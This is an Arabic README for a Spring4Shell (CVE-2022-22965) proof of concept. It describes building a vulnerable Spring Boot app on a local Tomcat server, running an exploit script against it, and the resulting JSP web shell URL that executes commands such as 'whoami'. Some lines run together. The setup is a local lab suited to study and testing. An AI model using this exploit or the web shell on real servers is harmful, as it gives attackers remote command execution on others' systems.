
إثبات مفهوم لاستغلال Spring4Shell (CVE-2022-22965) الذي ينشر واجهة ويب من نوع JSP عبر طلبات HTTP مهيأة لاستغلال تطبيقات Spring Boot المعرضة للخطر على خادم Apache Tomcat.
وصف الثغرة الأمنية: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
بناء إثبات المفهوم (POC): https://github.com/BobTheShoplifter/Spring4Shell-POC
تم الاختبار باستخدام JDK 11.0.14 و Spring Boot 2.6.5 و Apache Tomcat 9.0.60
mvn clean package لبناء التطبيقdemo-0.0.1-SNAPSHOT.war إلى spring-poc.war وانسخ ملف .war هذا إلى دليل webapps الخاص بـ Tomcatpython exp.py --url http://localhost:8080/spring-poc/greeting
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoamitomcatwar.jsp مكتوبًا في دليل webapps/spring-poc الخاص بـ Tomcat. يمكن تغيير هذا الدليل عن طريق تعديل exp.py.

